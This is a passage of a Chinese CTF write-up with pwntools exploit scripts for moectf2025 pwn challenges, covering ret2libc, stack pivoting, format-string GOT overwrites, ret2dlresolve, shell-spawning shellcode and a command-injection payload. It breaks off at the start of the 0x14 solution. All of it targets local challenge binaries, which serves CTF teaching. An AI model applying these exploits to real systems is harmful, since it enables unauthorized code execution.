moectf2025 & newstarctf2025(before week3)

0x00

粗糙地贴一份moectf2025以及newstarctf2025(至week3) pwn方向的全解。笔者已经不是新生，贴全题解也不是为了享受炸鱼快感。原本不打算发布，只是因为一些事，有一些感慨，所以发布此题解，仅仅希望能帮助到正在看的你，也权且算是笔者投身 pwn 的一次回望。
0x01 - 0x16 为 moectf2025题解，0x17及以后为 newstarctf2025 week3前的题解

0x01 boom

#!/usr/bin/env python3
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 50188
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)

io = start()

clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
clib.srand(clib.time(0))
canary = clib.random() % 114514
backdoor = 0x40127e

io.recvuntil(b'(y/n)')
io.sendline(b'y')

io.recvuntil(b'message:')
payload = b'\x00'*0x7c + p32(canary) + b'\x00'*0x10 + p64(0xdeadbeef) + p64(backdoor)
io.sendline(payload)


io.interactive()

0x02 boom_revenge

#!/usr/bin/env python3
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54984
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)

clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
io = start()
seed = clib.time(0) + 1 # remote + 1
clib.srand(seed)
canary = clib.random() % 114514
log.info("canary --> "+hex(canary))

backdoor = 0x40127e

io.recvuntil(b'(y/n)')
io.sendline(b'y')

io.recvuntil(b'message:')
payload = b'\x00'*0x7c + p32(canary) + b'\x00'*0x10 + p64(0xdeadbeef) + p64(backdoor)
io.sendline(payload)

io.interactive()

0x03 call_it

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 60044
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

menu = b'Choose your gesture: '

for _ in range(5):
    io.recvuntil(menu)
    io.sendline(b'3')  
    io.recvuntil(b'?')
    io.sendline(b'/bin/sh\x00')

gift = 0x401235
call_system = 0x401228
binsh = 0x404060

for _ in range(3):
    io.recvuntil(menu)
    io.sendline(b'6')  # n_gesture = 7

io.recvuntil(menu)
io.sendline(b'3')  
io.recvuntil(b'?')
io.sendline(p64(gift) + b'\x60\x40\x40\x00\x00\x00\x00')

io.recvuntil(menu)
io.sendline(b'3')  
io.recvuntil(b'?')
io.sendline(p64(call_system))

# myio(b'6', p64(gift) + b'/bin/sh')
# myio(b'6', p64(call_system))

io.interactive()

0x04 ez_u64

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 55998
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'hint.')
leak_data=u64(io.recv(8))
num=int(leak_data)
io.sendline(str(num))

io.interactive()

0x05 ezlibc

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 58058
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'0x')
read_plt_addr=int(io.recv(12),16)
log.success(hex(read_plt_addr))
elf_base=read_plt_addr-0x1060
log.success(hex(elf_base))

main_addr=elf_base+0x11ce
ret=elf_base+0x101a
payload=b'a'*0x20+p64(read_plt_addr)+p64(ret)+p64(main_addr)
io.send(payload)

io.recvuntil(b'0x')
read_addr=int(io.recv(12),16)
log.success(hex(read_addr))
#libc = LibcSearcher("read",read_addr)
#libc_base=read_addr-libc.dump("read")
libc_base=read_addr-libc.sym['read']
log.success(hex(libc_base))

pop_rdi_ret=libc_base+0x2a3e5
ret=pop_rdi_ret+1

#binsh=libc_base+libc.dump("str_bin_sh")
#sys=libc_base+libc.dump("system")
binsh=libc_base+next(libc.search('/bin/sh'))
sys=libc_base+libc.sym['system']

payload=b'a'*0x28+p64(ret)+p64(pop_rdi_ret)+p64(binsh)+p64(sys)
io.send(payload)

io.interactive()

0x06 ezpivot

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 62363
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
system = elf.plt['system']
pop_rdi_ret = 0x401219
ret = 0x401219 + 1
leave_ret = 0x40120f
bss = 0x404060

payload =  b'/bin/sh\x00'*0x100 + p64(bss) + p64(ret) + p64(pop_rdi_ret) + p64(bss) + p64(system)
io.recvuntil(b'introduction.')
io.sendline(b'-1')
io.send(payload)

payload = b'a'*0xc + p64(bss + 0x800) + p64(leave_ret)
io.recvuntil(b'number:')
io.send(payload)

io.interactive()

0x07 ezprotection

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 64058
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
orw_low = 0x128c

payload = b'a'*0x18 + b'b'
io.send(payload)

io.recvuntil(b'aab')
canary = u64(io.recv(7).rjust(0x8, b'\x00'))
log.success("canary --> "+hex(canary))
rbp = u64(io.recv(6).ljust(0x8, b'\x00')) 
log.success("rbp --> "+hex(rbp))

io.recvuntil(b'bytes.')
payload = b'a'*0x18 + p64(canary) + p64(rbp) + b'\x8c' + b'\x72'
io.send(payload)

io.interactive()

0x08 ezshellcode

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 62001
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
shellcode = asm('''
    xor 	rsi, rsi
    push	rsi	
    mov 	rdi, 0x68732f2f6e69622f
    push	rdi
    push	rsp		
    pop	    rdi			
    mov 	al,	59	
    cdq				
    syscall
''')
io.sendline(b'4')
io.recvuntil(b'set.\n')
io.send(shellcode)


io.interactive()

0x09 eztext

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 65306
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
sys_addr=0x4011cd
ret=0x40101a
io.recvuntil(b'?')
io.sendline(b'100')
payload=b'a'*0x10+p64(sys_addr)
io.sendline(payload)

io.interactive()

0x0a find_it

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 53309
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'it?\n')
io.sendline(b'3')
io.recvuntil(b'see?\n')
io.sendline(b'flag')
io.recvuntil(b'fd?\n')
io.sendline(b'1')

io.interactive()

0x0b fmt

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6_2.39-0ubuntu8_amd64/usr/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 59478
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6-dbg_2.39-0ubuntu8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/glibc-source_2.39-0ubuntu8_all/usr/src/glibc/glibc-2.39
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'name?')
payload=b'%7$s%10$p'
io.sendline(payload)
io.recvuntil(b'Nice to meet you,')
str2=io.recv(5)
log.success(str2)
io.recvuntil(b'0x')
hex_str=io.recv(10)
str1=bytes.fromhex(hex_str.decode()).decode('ascii')
log.success(str1)

io.interactive()

0x0c fmt_S

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 56167
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35
b talk
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
payload=b'%8$p%33$p'
io.recvuntil(b'him...')
io.sendline(payload)
io.recvuntil(b'0x')
stack_addr=int(io.recv(12),16)
ret_addr=stack_addr-0x18+0x20
i_addr=ret_addr+0x10-0x20
log.success("ret_addr in stack-->"+hex(ret_addr))
log.success("i_addr in stack-->"+hex(i_addr))
io.recvuntil(b'0x')
libc_start_main=int(io.recv(12),16)-128
libc_base=libc_start_main-libc.sym['__libc_start_main']
log.success("libc_base-->"+hex(libc_base))
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((i_addr & 0xffff) + 7).encode() + b"%17$hn" #修改跳板指向i的栈上地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format(0xff).encode() + b"%47$hhn" #修改i符号位
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format(ret_addr & 0xffff).encode() + b"%17$hn" #修改跳板指向main返回地址的栈上地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

backdoor=libc_base+0xebd3f #one_gadget

#0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
#constraints:
  #address rbp-0x48 is writable
  #rax == NULL || {rax, r12, NULL} is a valid argv
  #[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

payload='%{}c'.format(backdoor & 0xffff).encode() + b"%47$hn" #修改main返回地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((ret_addr & 0xffff) + 2).encode() + b"%17$hn" #修改跳板指向main返回地址的栈上地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((backdoor >> 16) & 0xffff).encode() + b"%47$hn" #修改main返回地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

rbp_addr=ret_addr-0x8

payload='%{}c'.format(rbp_addr & 0xffff).encode() + b"%17$hn" #修改跳板指向main的rbp的栈上地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

rbp=ret_addr+0x80-0x8 #找合适的rbp值

payload='%{}c'.format(rbp & 0xffff).encode() + b"%47$hn" #修改rbp
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((rbp_addr & 0xffff) + 2).encode() + b"%17$hn" #修改跳板指向main的rbp的栈上地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((rbp >> 16) & 0xffff).encode() + b"%47$hn" #修改rbp
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((rbp_addr & 0xffff) + 4).encode() + b"%17$hn" #修改跳板指向main的rbp的栈上地址
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.send(p64(0))

payload='%{}c'.format((rbp >> 32) & 0xffff).encode() + b"%47$hn" #修改rbp
io.recvuntil(b'him...')
io.send(payload)
io.recvuntil(b'battle!')
io.sendline(b'0') #使main返回

io.interactive()

0x0d fmt_T

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 60002
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35
b printf
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
payload = b'%11$p'
io.send(payload)
io.recvuntil(b'0x')
libc_base = int(io.recv(12), 16) + 0x30 - libc.sym['__libc_start_main']
log.success("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
target_got = elf.got['printf']
log.info("target addr --> "+hex(target_got))
log.info("printf addr --> "+hex(libc_base+libc.sym['printf']))
log.info("system addr --> "+hex(system))

payload = b'%;sh'
io.recvuntil(b'hell.\n')
io.send(payload)

payload = p64(target_got) + b'\x1a\x40\x40\x00\x00\x00\x00'
io.recvuntil(b'hell.\n')
io.send(payload)

#payload = b'-%24$p-%25$p-'
#io.recvuntil(b'hell.\n')
#io.send(payload)

val1 = (system & 0xffff)
val2 = ((system >> 16) & 0xffff) - val1 + 0x10000
payload = '%{}c'.format(val1).encode() + b"%24$hn" + '%{}c'.format(val2).encode() + b"%25$hn"
io.recvuntil(b'hell.\n')
io.send(payload.ljust(26))

io.interactive()

0x0e hardpivot

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 64689
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
b vuln
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
pop_rdi_ret = 0x40119e
ret = 0x40101a
leave_ret = 0x40127b
main = 0x40127d
vuln = 0x401264 #just read
bss = 0x404060

io.recvuntil(b'> ')
payload = b'a'*0x40 + p64(bss + 0x1000) + p64(vuln)
io.send(payload)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

payload = p64(bss + 0x800) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln) + b'a'*0x18 + p64(bss + 0x1000 - 0x40) + p64(leave_ret)
io.send(payload)

puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success("puts_addr --> "+hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
log.success("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
binsh = bss + 0x800 - 0x8

payload = p64(bss + 0x400) + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) + b'/bin/sh\x00'*3 + p64(bss + 0x800 - 0x40) + p64(leave_ret)
io.send(payload)

io.interactive()

0x0f inject

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 52758
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

payload = b'\n' + b'cat flag -- '

io.sendline(b'4')
io.send(payload)

io.interactive()

0x10 no_way_to_leak

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6_2.31-0ubuntu9.18_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 57889
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b vuln
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6-dbg_2.31-0ubuntu9.18_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/glibc-source_2.31-0ubuntu9.18_all/usr/src/glibc/glibc-2.31
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

offset = 0x78
read_length = 0x100

rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=["/bin/sh"])

rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()

payload = flat({offset:raw_rop, read_length:dlresolve.payload})
io.send(payload)
log.info(rop.dump())

io.interactive()

0x11 prelibc

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54127
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
libc_base = leak_addr - libc.sym['printf']
log.info("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1

payload = b'a'*0x48 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.recvuntil(b'> ')
io.send(payload.ljust(0x100, b'\x00'))

io.interactive()

0x12 randomlock

from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54327
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


# Your exploit here
clib=ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
for i in range(100):
    io = start()
    io.recvuntil(b'me?')
    clib.srand(i)
    for j in range(10):
        io.recvuntil(b'>')
        val=clib.rand() % 10000;
        io.sendline(str(val))
        res=io.recvline()
        if b"Incorrect password." in res:
            break
    break

io.interactive()

0x13 shellbox

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 52443
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
pop_rax_ret = 0x44bbbb
pop_rdi_ret = 0x401a40
pop_rsi_ret = 0x401a42
pop_rdx_ret = 0x401a44
pop_rsp_ret = 0x4121a8
ret = 0x40101a
syscall = 0x401268
pop_rdi_rbp_ret = 0x4025e1


mprotect = 0x443520
#openat = 0x442840
#read = 0x442950
#write = 0x4429f0

buf = 0x4ceb60

shellcode = asm('''
    push 0x67616c66
    mov rsi,rsp
    xor rdx,rdx
    mov rdi,0xffffff9c
    push 257
    pop rax
    syscall
    mov rdi,rax
    mov rsi,rsp
    mov edx,0x100
    xor eax,eax
    syscall
    mov edi,1
    mov rsi,rsp
    push 1
    pop rax
    syscall
''')

io.recvuntil(b'.')
io.send(shellcode)

io.recvuntil(b'>')
payload = b'a'*4 + p32(1)
io.send(payload)

def rop(data):
    io.recvuntil(b'>')
    io.send(data)

rop(p64(pop_rdi_ret))
rop(p64(0x4ce000))
rop(p64(pop_rsi_ret))
rop(p64(0x1000))
rop(p64(pop_rdx_ret))
rop(p64(7))
rop(p64(mprotect))
rop(p64(buf))

io.interactive()

0x14 strcheck

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
